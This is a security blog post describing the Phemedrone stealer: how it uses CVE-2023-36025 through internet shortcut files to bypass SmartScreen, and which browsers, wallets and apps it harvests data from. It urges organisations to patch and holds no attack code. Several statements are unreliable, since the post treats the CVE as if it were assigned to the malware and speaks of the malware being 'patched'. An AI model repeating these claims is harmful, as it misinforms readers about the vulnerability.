Cybersecurity researchers, have discovered a new window malware by the name Phemedrone stealer, to be actively exploited in the wild. The malware which is said to target users browsers, and information found in crypto wallets, mobile messaging apps such as Discord, steam, and Telegram, is sophisticated enough to steal sensitive information such as hardware location, operating system details, screen-grabbing infected device.
Phemedrone stealer is an open source based, coded in C# programming language, and communicates with the attacker C2 server in the bid to exfiltrate these stolen information. In a more sophisticated discovery, the malware which is assigned the CVE-2023-36025, is capable of compromising Microsoft Windows defender SmartScreen, due to lack of security checks, and command prompts associated with the internet shortcut URL files.
Phemedrone malware infestation:
According to researchers at Trend Micro, the Phemedrone malware is hosted as a series of internet shortcut files on hosting providers such as FileTransfer.io, and messaging apps such as discord. In the bid to obfuscate this malware, the threat actor is said to host them as shortened URL’s , tricking an unsuspecting user into opening the URL which then exploits the CVE-2023-36025.
Upon execution, a reverse-shell is established (the victim device connects back to the attacker C2-server), and proceeds to download a *.cpl file, which is a control panel file. In other to evade detection from Microsoft defender, the threat actor crafted a windows shortcut url, thereby restricting SmartScreen protection from noticing the malicious *.cpl file as a payload (malicious file consisting of codes).
On the exploitation techniques, MITRE ATT&CK T1218.002, was leveraged by the threat actor to abuse the binary file (control.exe) of the Windows control panel.
Phemedrone malware capabilities:
The malware Phemedrone stealer allows threat actors to circumvent the Microsoft Windows Defender smart screen. Upon a successful bypassing, the malware sets to steal sensitive information’s such as Passwords, authentication cookies, and other data stored in the browser of the infected users device.
Although the malware was first patched sometime in November 2023 (last year), however, threat actors are said to still exploit devices that are yet to be patched, and vulnerable to the malware infestation & exploitation.
Notable targeted applications:
Phemedrone Malware was discovered in the cause of the research, to have targeted multiple applications, and exfiltrate sensitive information. Further findings by Trend Micro, indicates the following applications were exploited, and the respective information stolen by the threat actor. These applications were compromised:
- Chromium based browsers: Browsers such as chromium were targeted by this malware, and information’s such as LastPass, Keepass, NordPass, Google authenticator, Duo Mobile, and Microsoft Authenticator were exfiltrated.
- Crypto wallets: Phemedrone was discovered to target crypto wallets such as Armory, Atomic, Bytecoin, Coninomi, etc.
- Discord: Authentication tokens for the infected users discord app are stolen, and unauthorized access to the victims account is granted.
- FileZilla: The malware also is able to intercept an established connection of the FTP application FileZilla, and sensitive credentials such as username, password, IP address, are harvested.
- System information: Phemedrone is capable of stealing Sensitive information’s such as Geo-Location, Hardware specifications, OS info and version, and screengrab the victim’s computer device.
- Steam Gaming: The gaming platform steam, was not left out, as it was discovered to be exploited by the malware, enabling hackers to gain unauthorized access to files belonging to the gaming platform.
Conclusion:
Although the malware has been patched, it is said that threat actors are finding new ways to exploit the CVE-2023-36025, and subsequently evade Windows Defender Smart Screen Protection. This is made possible, as big organizations, are yet to patch their various vulnerable devices. Organizations, are hereby advised to patch their device as soon as possible.
It should also be notable, that CVE-2023-36025 exploit POC is discovered in wild, and more threat actors would find ways to leverage the Phemedrone malware , in targeting high profile organizations or individuals whose devices are yet unpatched.
At fixitgearware security we are security conscious, and advice our readers, and the public out there to be as well. Also, organizations are advised to update the necessary patches as provided by Microsoft. For more information and discovery about this malware, head on to Trend Micro.
Remember to always stay safe, and be vigilant 🛡️!
Put your comments below in the comment section on your thoughts about this.